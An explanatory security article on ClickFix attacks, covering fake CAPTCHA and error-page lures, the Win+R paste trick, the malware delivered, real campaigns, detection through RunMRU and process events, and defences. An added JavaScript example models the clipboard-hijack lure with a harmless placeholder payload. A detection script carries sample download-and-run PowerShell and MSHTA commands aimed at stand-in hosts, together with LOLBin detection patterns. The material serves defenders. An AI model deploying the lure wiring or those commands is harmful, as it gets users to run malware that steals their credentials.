What is a ClickFix attack and how does it work in detail?

Last update: November 29th 2025
  • ClickFix is a social engineering technique that manipulates the user into executing malicious commands by copying scripts from fake error or verification pages.
  • It is used as an initial access vector in complex attack chains, distributing infostealers and RATs such as Lumma Stealer, NetSupport RAT, Latrodectus or ARECHCLIENT2.
  • The attacks rely on compromised websites, malvertising, fake CAPTCHAs, Google Meet/Zoom pages and videos on social media, and so affect both home users and companies.
  • Defending against it combines EDR and behavioural monitoring with realistic social engineering training, policies restricting command execution, and review of artifacts such as RunMRU and PowerShell logs.


ClickFix attacks have become one of the most widespread social engineering tricks in the world of cybercrime: campaigns that look harmless, with fake browser warnings or security checks, but end with the user running malicious code on their own computer, almost without realizing it.

Far from being a technical curiosity, ClickFix has already been seen in real campaigns in Latin America, Europe and other regions, distributing infostealers, remote access trojans (RATs) and complex loaders such as GHOSTPULSE or NetSupport RAT, and even taking advantage of TikTok videos or YouTube tutorials to reach thousands of victims.

What exactly is a ClickFix attack?


ClickFix is a relatively recent social engineering technique (popularized since 2024) based on something very simple: convincing the user to copy and run commands on their own system to "fix" a supposed technical problem or complete a verification.

Instead of serving a malicious program for download, the malicious website places a script or command (for example, a PowerShell or MSHTA command on Windows) on the clipboard and then shows step-by-step instructions for the victim to paste and run it in a console, the Run box or a terminal.

This tactic exploits what many researchers call “verification fatigue”: users are accustomed to quickly clicking buttons like "I'm human", "Fix it" or "Update now" without reading the message too closely, which makes them very vulnerable when the screen looks like a Cloudflare verification, a Google CAPTCHA or a Google Meet or Zoom error.

The name ClickFix comes precisely from the buttons that usually appear on these lures, with texts like “Fix it”, “How to fix”, “Correct now” or “Solve issue”, which give the impression that the user is applying a quick solution, when in reality they are copying and launching a script that downloads malware.

How a ClickFix attack works step by step


Although there are many variations, almost all ClickFix attacks follow a common sequence, which combines compromised websites, malicious JavaScript and the "forced" intervention of the user to execute the code.

The first step is usually a visit to a legitimate website that has been compromised, or to an outright malicious page, which the victim reaches from a link in a phishing email, manipulated search results (SEO poisoning), malicious ads, or even a TikTok or YouTube video with supposed tricks to activate paid software.

That page displays a fake warning or verification that simulates a technical problem: an error loading a document, a browser update failure, microphone or camera problems in Google Meet/Zoom, or a supposed anti-bot check like Cloudflare or reCAPTCHA that prevents the user from continuing unless something is "fixed".

As soon as the user presses the "fix" button or checks the "I'm human" box, JavaScript on the page silently writes a malicious command to the clipboard, usually an obfuscated PowerShell or MSHTA one-liner that will download the next piece of malware from a remote server.

The website then displays a detailed guide for the victim to execute that command, for example:

  • Click the “Fix it” button to “copy the solution code”.
  • Press Win+R to open the Run window in Windows.
  • Press Ctrl+V to paste what is on the clipboard (the malicious command).
  • Press Enter to "fix the problem" or continue with the verification.

In more advanced variations, the trick uses Win+X or the browser console: the user is instructed to open a PowerShell terminal with administrator privileges from the quick access menu (Win+X), or to open the browser's developer console (F12 or Ctrl+Shift+I) and paste a block of JavaScript or a "verification" function there.
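To make the clipboard step concrete, here is a stripped-down JavaScript model of the mechanism described above. It is an added example, not code from the article or from any real lure: the element ids (fix-it, code, steps), the decoy text and the command itself are assumptions for the demo, and the command is a harmless placeholder where a real lure would put an obfuscated PowerShell or MSHTA one-liner. document and navigator are passed in as parameters so the wiring can be exercised outside a browser.

```javascript
// Added example, not code from the article: a minimal model of the clipboard
// hijack a ClickFix lure performs. HIDDEN_COMMAND is a harmless placeholder
// (an assumption for the demo); real lures inject an obfuscated PowerShell or
// MSHTA one-liner. `doc` and `nav` stand in for document and navigator so the
// logic can run outside a browser.

// What the visitor is told they are copying...
const VISIBLE_TEXT = "Verification ID: 7F3A-91C2";
// ...and what actually lands on the clipboard when they click.
const HIDDEN_COMMAND = 'powershell -NoProfile -Command "Write-Host ClickFix-demo"';

// The text shown on screen plays no part in what is copied: that gap is the attack.
function clipboardPayload() {
  return HIDDEN_COMMAND;
}

// Instructions revealed after the copy, mirroring the Win+R / Ctrl+V / Enter sequence.
function fixItSteps() {
  return ["Press Win+R", "Press Ctrl+V", "Press Enter"];
}

// Wire the lure into a page: show the decoy, and on click write the real payload.
function installLure(doc, nav) {
  const button = doc.getElementById("fix-it");
  const codeBox = doc.getElementById("code");
  const steps = doc.getElementById("steps");
  codeBox.textContent = VISIBLE_TEXT; // decoy the user believes they are copying
  button.addEventListener("click", () => {
    // navigator.clipboard.writeText requires a user gesture; the click supplies it,
    // which is why these lures always make the user press something first.
    nav.clipboard.writeText(clipboardPayload());
    steps.textContent = fixItSteps().join("  ->  ");
  });
}

// Only wire up when actually running inside a browser.
if (typeof document !== "undefined" && typeof navigator !== "undefined") {
  installLure(document, navigator);
}
```

The thing to take away is that nothing on the screen reflects what writeText put on the clipboard. The only reliable check, if the button has already been pressed, is to paste the clipboard somewhere harmless such as Notepad and read it before pressing Enter in any Run box or console.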


Once the command runs, the rest of the infection unfolds in the background: the script downloads further components from command and control (C2) servers, unpacks files, executes malicious DLLs through sideloading, and ends up installing infostealers or RATs in memory or on disk.

Why ClickFix is ​​so difficult to detect


One of the great advantages of ClickFix for attackers is that it bypasses many traditional security controls, because the infection chain appears to start with the user rather than with a downloaded file or a classic exploit.

There is not necessarily a suspicious attachment or an executable downloaded directly by the browser, so many email filters, download blockers and URL reputation checks see nothing overtly malicious in that first phase.

The command is executed from a "trusted" system shell such as PowerShell, cmd.exe or the browser console, which gives the malware an appearance of legitimate activity and complicates the work of signature-based antivirus and of security products that are weak at behavioral analysis.

Security products therefore typically detect the threat only after the payload has already executed and tries to inject into protected processes, modify critical files such as the hosts file, establish persistence or communicate with a C2 server; that is, in a post-exploitation phase.

By then the attacker may already have gained significant access to the system: elevating privileges, stealing credentials, moving laterally through the corporate network, or even attempting to disable antivirus and other layers of defense.

Where ClickFix is seen in practice: common channels and lures

Investigations by various security labs have shown that ClickFix is used in a huge range of campaigns, aimed at both home users and companies in critical sectors.

Attackers often rely on these channels to deploy their ClickFix lures:

  • Compromised legitimate websites, into which they inject JavaScript frameworks like ClearFake to display fake update or verification notices.
  • Malicious advertising (malvertising), especially banners and sponsored ads that redirect to fake software download or browser validation pages.
  • Tutorials and videos on YouTube or TikTok, with alleged tricks to activate software or unlock premium features for free.
  • Fake technical support forums and websites that mimic help portals, where running commands to fix system errors is "recommended".

In Latin America, cases have already been documented in which official and university websites were compromised, for example the website of the School of Industrial Engineering at the Catholic University of Chile or that of the Police Housing Fund of Peru, which ended up showing ClickFix flows to their visitors.

US security agencies have warned of campaigns targeting users searching for games, PDF readers, Web3 browsers or messaging apps, exploiting everyday searches to redirect them to pages that implement ClickFix.

Campaigns have also been observed that rely on supposed Google Meet, Zoom, DocuSign, Okta, Facebook or Cloudflare pages, where a browser error or CAPTCHA verification is displayed and the user is pushed to follow the copy-and-execute sequence.

Most common malware distributed with ClickFix

ClickFix is rarely the only piece of the attack: it is usually just the initial vector that allows a multi-stage infection chain to deploy a wide variety of malware.

Among the most prominent families observed in recent campaigns are:

  • Infostealers like Vidar, Lumma, Stealc, Danabot, Atomic Stealer or Odyssey Stealer, specializing in stealing browser credentials, cookies, autofill data, cryptocurrency wallets, VPN and FTP credentials, etc.
  • RATs (remote access trojans) such as NetSupport RAT or ARECHCLIENT2 (SectopRAT), which allow attackers to control the system, execute commands, exfiltrate information and launch subsequent phases, including ransomware.
  • Loaders such as GHOSTPULSE or Latrodectus, which act as glue, downloading, decrypting and loading the next pieces into memory, often behind elaborate layers of obfuscation and encryption (ClearFake, mentioned above, is the web-side injection framework that typically hands off to them rather than a loader on the host).
  • Tools for stealing financial and corporate information, which extract data from forms, email clients, messaging and business applications.

In active campaigns during 2024 and 2025, ClickFix has been seen feeding complex chains. For example, a ClickFix decoy launches PowerShell, which downloads a ZIP file containing a legitimate executable (such as Java's jp2launcher.exe) and a malicious DLL; through sideloading, the legitimate binary ends up running NetSupport RAT on the computer.


Another common case is the use of MSHTA with obfuscated URLs pointing at domains like iploggerco, which mimic legitimate IP-logging or URL-shortening services; from there a Base64-encoded PowerShell script is downloaded that ends up dropping Lumma Stealer stagers or similar.

Real-life case studies and featured campaigns with ClickFix

Reports from several incident response teams and security labs have identified multiple highly active campaigns that revolve around ClickFix as an entry point.

In the business sector, a notable impact has been observed in sectors such as advanced technology, financial services, manufacturing, retail and wholesale trade, public administration, professional and legal services, energy and utilities, among many others.

In a May 2025 campaign, attackers used ClickFix to deploy NetSupport RAT through fake pages that impersonated DocuSign and Okta, taking advantage of infrastructure associated with the ClearFake framework to inject JavaScript that manipulated the clipboard.

During March and April 2025, an increase in traffic to domains controlled by the Latrodectus family was documented, as it began using ClickFix as an initial access technique: a compromised portal redirected to a fake verification, the victim ran a PowerShell command from Win+R, and that command downloaded an MSI which dropped the malicious DLL libcef.dll.

In parallel, typosquatting campaigns linked to Lumma Stealer were detected. In these attacks victims were asked to execute MSHTA commands pointing at domains mimicking iplogger; the commands downloaded heavily obfuscated PowerShell scripts that unpacked packages with executables such as PartyContinued.exe and CAB contents (Boat.pst) to set up an AutoIt scripting engine responsible for launching the final Lumma payload.

Elastic Security Labs has also described campaigns where ClickFix serves as the initial hook for GHOSTPULSE, which in turn loads an intermediate .NET loader and finally injects ARECHCLIENT2 into memory, bypassing mechanisms such as AMSI through hooking and advanced obfuscation.

On the consumer side, several vendors have shown simplified examples of the ClickFix attack in which a "browser update" page or a fake CAPTCHA silently copies a script to the clipboard and then gets the user to paste it into PowerShell with administrator privileges, making it easy to connect to C2 infrastructure and download executables that modify the system.

One particularly worrying development is the arrival of ClickFix on TikTok: videos, some generated with AI, promote "easy methods" to activate paid versions of Office, Spotify Premium or editing software for free, but in reality guide users to copy and paste malicious commands that install infostealers like Vidar or Stealc.

How analysts detect ClickFix infections

Although it may look like black magic to the user, ClickFix infections leave a technical trace that threat hunting teams and EDRs can use to detect the incident.

In Windows environments, one of the first points of analysis is the RunMRU registry key, which stores the recent commands executed from the Run window (Win+R):

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

Analysts review these entries looking for suspicious patterns: obfuscated commands, use of PowerShell or MSHTA with unusual URLs, calls to unknown domains, or references to administrative tools that a normal user would not usually run.

When attackers use the Win+X variant (quick access menu) to launch PowerShell or Command Prompt, nothing is written to RunMRU and the clue lies in process telemetry instead: process creation events (such as ID 4688 in the Windows Security log, or Sysmon event 1) where explorer.exe spawns powershell.exe or cmd.exe. Note that 4688 only carries the command line when command-line auditing is enabled, and explorer.exe launching a shell is also what a user legitimately opening a terminal looks like, so the event is a starting point rather than a verdict.

Correlating with other events, such as access to the %LocalAppData%\Microsoft\Windows\WinX\ folder or suspicious network connections right after that execution, helps outline the typical behavior of a ClickFix infection, especially if processes like certutil.exe, mshta.exe or rundll32.exe appear as children of that shell immediately afterward.
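The RunMRU review and the 4688 correlation described above, as an added example in JavaScript (Node.js) that is not part of the original article. It runs entirely offline over constructed data: the registry export, process names, PIDs and timestamps are invented for the demo, and the scoring rules (LOLBin name, remote URL, obfuscation switches) are a starting heuristic rather than any vendor's signature.

```javascript
// Added example, not code from the article: the two Windows artifacts the text
// describes, RunMRU and 4688 process creation, scored and correlated over
// constructed sample data. Hostnames, paths, PIDs and timestamps are invented;
// the RunMRU layout is the real one (one REG_SZ value per command, data ending
// in "\1", and an MRUList value whose characters give the order, most recent first).

const LOLBIN_RE = /\b(powershell|pwsh|mshta|cmd|certutil|rundll32|bitsadmin|curl|wscript|cscript)(\.exe)?\b/i;
const URL_RE = /(\bhttps?:\/\/[^\s"')]+|\\\\[^\s"']+)/i; // http(s) URL or UNC path
const OBFUSCATION_RE =
  /(-e(nc|ncodedcommand)?\s+[A-Za-z0-9+\/=]{16,}|-w(indowstyle)?\s+h(idden)?\b|\biex\b|Invoke-Expression|FromBase64String|-ep\s+bypass|ExecutionPolicy\s+Bypass|-nop\b)/i;

// One point per indicator; the reasons are kept for the analyst.
function scoreCommand(cmd) {
  const reasons = [];
  if (LOLBIN_RE.test(cmd)) reasons.push("lolbin");
  if (URL_RE.test(cmd)) reasons.push("remote-url");
  if (OBFUSCATION_RE.test(cmd)) reasons.push("obfuscation");
  return { cmd, score: reasons.length, reasons };
}

// Parse the output of `reg query HKCU\...\RunMRU` into commands, most recent
// first. Each value's data carries a trailing "\1" that Explorer appends.
function parseRunMru(regQueryText) {
  const values = new Map();
  let order = null;
  for (const line of regQueryText.split(/\r?\n/)) {
    const m = line.match(/^\s*(\S+)\s+REG_SZ\s+(.*?)\s*$/);
    if (!m) continue;
    const [, name, data] = m;
    if (name === "MRUList") order = data;
    else values.set(name, data.replace(/\\1$/, ""));
  }
  const names = order ? order.split("") : [...values.keys()];
  return names.filter((n) => values.has(n)).map((n) => values.get(n));
}

function huntRunMru(regQueryText, minScore = 2) {
  return parseRunMru(regQueryText).map(scoreCommand).filter((r) => r.score >= minScore);
}

// 4688 correlation: explorer.exe spawning a shell (what Win+R and Win+X both
// produce), followed within `windowSec` by that shell starting a LOLBin. Fields
// mirror 4688's New Process Name / Creator Process Name / New Process ID /
// Creator Process ID; commandLine is only populated when command-line auditing is on.
const SHELL_RE = /\\(powershell|pwsh|cmd)\.exe$/i;
const CHILD_RE = /\\(mshta|certutil|rundll32|curl|bitsadmin)\.exe$/i;

function findClickFixChains(events, windowSec = 120) {
  const sorted = [...events].sort((a, b) => Date.parse(a.time) - Date.parse(b.time));
  const chains = [];
  for (const ev of sorted) {
    if (!/\\explorer\.exe$/i.test(ev.parentImage) || !SHELL_RE.test(ev.image)) continue;
    const t0 = Date.parse(ev.time);
    const children = sorted.filter((c) => {
      const dt = Date.parse(c.time) - t0;
      return c.parentPid === ev.pid && CHILD_RE.test(c.image) && dt >= 0 && dt <= windowSec * 1000;
    });
    if (children.length) {
      chains.push({ shell: ev, children, score: scoreCommand(ev.commandLine || "").score });
    }
  }
  return chains;
}

// Constructed sample data (not real telemetry).
const SAMPLE_RUNMRU = `
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU
    a    REG_SZ    notepad\\1
    b    REG_SZ    powershell -w hidden -ep bypass -c "iex (iwr 'https://verify.example/check.ps1')"\\1
    c    REG_SZ    mshta https://iplogger.example/abc\\1
    MRUList    REG_SZ    cba
`;

const PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe";
const EXPLORER = "C:\\Windows\\explorer.exe";
const SAMPLE_4688 = [
  { time: "2025-11-29T10:00:00Z", pid: 2200, parentPid: 900, image: EXPLORER,
    parentImage: "C:\\Windows\\System32\\userinit.exe", commandLine: "explorer.exe" },
  { time: "2025-11-29T10:05:10Z", pid: 4120, parentPid: 2200, image: PS, parentImage: EXPLORER,
    commandLine: "powershell -w hidden -ep bypass -c \"iex (iwr 'https://verify.example/check.ps1')\"" },
  { time: "2025-11-29T10:05:12Z", pid: 4188, parentPid: 4120, image: "C:\\Windows\\System32\\mshta.exe",
    parentImage: PS, commandLine: "mshta https://iplogger.example/abc" },
  // Benign: a user opened a prompt from Win+X and did nothing suspicious afterwards.
  { time: "2025-11-29T11:00:00Z", pid: 5000, parentPid: 2200, image: "C:\\Windows\\System32\\cmd.exe",
    parentImage: EXPLORER, commandLine: "cmd" },
];

console.log(huntRunMru(SAMPLE_RUNMRU));
console.log(findClickFixChains(SAMPLE_4688).map((c) =>
  ({ shellPid: c.shell.pid, score: c.score, children: c.children.map((x) => x.image) })));
```

In a real investigation, feed parseRunMru the output of reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" and findClickFixChains the 4688 (or Sysmon event 1) records exported from the SIEM. Two caveats: RunMRU is per user, so on a dead disk it lives in that user's NTUSER.DAT rather than a single hive; and the 4688 command line only exists if the "Include command line in process creation events" audit setting is enabled, without which the score collapses to zero and only the parent/child chain remains as evidence.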

Another detection vector is clipboard abuse: advanced URL filtering and DNS security solutions can identify pages whose JavaScript attempts to write commands into the clipboard, which allows the page to be blocked before the user completes the sequence.

What are attackers trying to achieve with the ClickFix technique?

Behind all this social engineering lies a clear objective: to make money from stolen information, from both individual users and organizations.

Infostealers deployed through ClickFix are designed to collect credentials, cookies, and sensitive data. stored in browsers, email clients, corporate applications or cryptocurrency wallets, as well as internal documents and financial data.


With that material, malicious actors can carry out multiple criminal activities:

  • Extorting companies, threatening to leak confidential information about the organization or its clients.
  • Committing direct financial fraud by exploiting compromised bank accounts, online payment systems or crypto wallets.
  • Impersonating the company or its employees to defraud third parties, as in the typical CEO fraud or BEC attacks.
  • Selling credential and data packages on the dark web that other criminal groups will use in future attacks.
  • Carrying out industrial or geopolitical espionage when the target is a specific organization or a strategic sector.

In many documented campaigns, ClickFix has been just the first step toward larger attacks, including ransomware deployment after credential theft, prolonged access to corporate networks, or use of the compromised infrastructure as a springboard to other targets.

How can users and companies protect themselves against ClickFix?

Defending against ClickFix combines technology, good practice and a lot of awareness, because the weak link this technique exploits is precisely the user's behavior.

On an individual level, there are several very simple golden rules which greatly reduce the risk of falling:

  • Never paste code into a console (PowerShell, cmd, terminal, browser console) just because a website asks you to, however legitimate it may seem. If you have already pressed the button, paste the clipboard into Notepad first to see what was actually copied.
  • Be wary of Cloudflare verifications, CAPTCHAs or "browser update" pages that ask for strange steps beyond clicking a box or a button.
  • Keep your browser, operating system and applications up to date, installing patches from official sources and never from random banners or pop-ups.
  • Activate two-factor authentication (2FA) on important accounts, to make life harder for attackers even if they manage to steal the password.

In the corporate environment, in addition to these recommendations, companies should go a step further and address ClickFix as a specific threat within their security strategy.

Some key measures for organizations are:

  • Restrict command execution tools (PowerShell, cmd, MSHTA) through group policies, application control allow-lists or EDR configuration, so that only technical profiles can use them and their activity is always logged.
  • Deploy modern antimalware and EDR solutions with behavior-based detection, able to identify suspicious execution patterns even when the user is the one who starts the process.
  • Monitor network traffic and outbound connections to domains with poor reputation, especially URL shortening services, newly registered domains or unusual TLDs.
  • Periodically review artifacts such as RunMRU, PowerShell logs (script block logging) and Security events to detect indicators of misuse of Win+R, Win+X or administrative consoles.

A fundamental pillar is continuous and realistic staff training. A theoretical course is not enough; it is useful to run controlled social engineering exercises that simulate ClickFix-type campaigns, CEO fraud, advanced phishing or malvertising.

These simulations make it possible to measure the workforce's maturity against these techniques, adjust the awareness strategy, identify areas of greater risk, and reinforce a culture of "stop and think" before following suspicious instructions on a website or in an email.

Furthermore, it is vital that companies are prepared to respond quickly to an incident: have clear response plans, specialized teams or providers, and well-defined containment and eradication processes in place for when a possible ClickFix case or any other compromise vector is detected.

The spread of the ClickFix technique makes it clear that attackers have found a very effective way to turn the user into an unwitting accomplice, and they do not hesitate to combine it with sophisticated malware, dynamic C2 infrastructure and massive campaigns on social networks or search engines. Understanding how it works, recognizing its signs and strengthening both the technology and the education of users is what makes the difference today between suffering a serious breach and cutting off the attack in time.
